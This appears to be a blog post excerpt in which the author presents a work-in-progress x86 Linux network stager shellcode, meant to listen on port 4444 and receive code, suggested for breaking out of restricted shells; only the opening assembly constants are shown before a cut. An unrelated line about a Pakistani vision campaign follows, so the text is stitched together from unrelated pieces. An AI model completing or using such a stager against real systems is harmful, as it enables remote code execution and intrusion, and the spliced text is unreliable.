Last day I was asking myself about metasploit not seeming to have a real x86 Linux stager and I was like : oh let's do it since I have time today. This shellcode was untested and not optimised. It is only a Work In Progress since I will be quite busy these few next weeks. My guess for it's usage would be for jailbreaking (restricted shell but vulnerable program who knows? ;) ) or simply for doing specific tasks which might need space. For now it's 106 bytes, there is room for improvements of course ;) . Here it is : ; AGPL v3 ; Author : m_101 bits 32 ; socket function number %define SYS_SOCKET 1 %define SYS_BIND 2 %define SYS_LISTEN 4 %define SYS_ACCEPT 5 %define SYS_RECV 10 ; %define AF_INET 2 %define SOCK_STREAM 1 %define PROT_NONE 0 %define PROT_READ 1 %define PROT_WRITE 2 %define PROT_EXEC 4 %define MAP_SHARED 1 %define MAP_PRIVATE 2 %define MAP_FIXED 16 ; %define SIZEOF_SOCKADDR_IN 16 ; %define PORT 4444 section .text stager: ; socket openi...
Awaz Apni Baat Apni is started in new Vision of Pakistan, We want to see a real image of Pakistan in public Point of View, Our Pakistan with New Vision.

